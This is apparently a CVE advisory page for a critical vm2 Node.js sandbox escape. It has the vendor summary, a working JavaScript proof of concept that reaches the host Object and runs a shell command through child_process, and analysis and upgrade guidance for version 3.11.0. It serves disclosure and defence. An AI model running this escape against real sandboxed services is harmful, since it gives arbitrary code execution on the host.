vm2 CVE-2026-43997
CRITICALSeverity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/patriksimek/vm2).
CVSS VectorVendor: https://github.com/patriksimek/vm2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Summary
It is possible to obtain the host Object, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.
Details
There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)
PoC
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = {
[sym]: (depth, opt, inspect) => {
inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});Impact
Sandbox Escape -> RCE
AnalysisAI
Remote code execution in vm2 Node.js sandbox library (versions ≤3.10.5) allows attackers to escape isolation and execute arbitrary system commands by exploiting incomplete host Object protections. Attackers leverage JavaScript prototype chain manipulation to obtain host-context symbols, enabling injection of malicious code into Node.js inspection routines. Publicly available exploit code exists with working proof-of-concept demonstrating command execution via child_process. CVSS 10.0 (Critical) with network attack vector and no authentication required. Fixed in vm2 3.11.0, part of coordinated release addressing 13 sandbox-escape vulnerabilities.
Technical ContextAI
vm2 is a popular Node.js sandboxing library (npm package) designed to execute untrusted JavaScript in isolated contexts. This vulnerability (CWE-94: Improper Control of Generation of Code) exploits JavaScript's prototype chain and symbol system to break context isolation. The attack chains __lookupGetter__, Buffer.apply methods, and prototype traversal to obtain the host environment's Object constructor. Once the host Object is accessible, attackers extract internal Node.js symbols like Symbol(nodejs.util.inspect.custom) using getOwnPropertySymbols. By overriding the inspection symbol on a crafted object and passing it to WebAssembly.compileStreaming (which triggers util.inspect error handling), the attacker's function executes with host-context privileges, gaining access to process.getBuiltinModule and child_process for arbitrary command execution. Previous protections in commit ebcfe94ad2f864f0bc35e78cff1d921107cfd160 attempted to restrict host Object access but left multiple bypass paths. The NPM package identifier is pkg:npm/vm2.
RemediationAI
Upgrade vm2 to version 3.11.0 or later immediately, per GitHub release notes at https://github.com/patriksimek/vm2/releases/tag/v3.11.0. This coordinated security release addresses 13 sandbox-escape vulnerabilities including this cross-realm symbol extraction issue. Update NPM dependency with 'npm install vm2@3.11.0' or update package.json to specify '"vm2": "^3.11.0"' and run npm update. For environments unable to upgrade immediately, implement strict network isolation around vm2 execution contexts using OS-level containerization (Docker with --network=none, gVisor, Firecracker) to limit post-exploitation impact-however, this only mitigates RCE consequences and does not prevent sandbox escape. Alternative: migrate to isolated-vm (https://github.com/laverdet/isolated-vm) which uses V8 isolates rather than context-based sandboxing, though this requires code refactoring and has different performance characteristics. The new bufferAllocLimit option in 3.11.0 also addresses heap exhaustion DoS vectors (GHSA-6785-pvv7-mvg7). Organizations should audit all deployments accepting untruated code and prioritize upgrade testing, as the 3.11.0 release maintains API compatibility with no breaking changes to existing public surface.
Same weakness CWE-94 – Code Injection
View allSame technique Code Injection
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-47x8-96vw-5wg6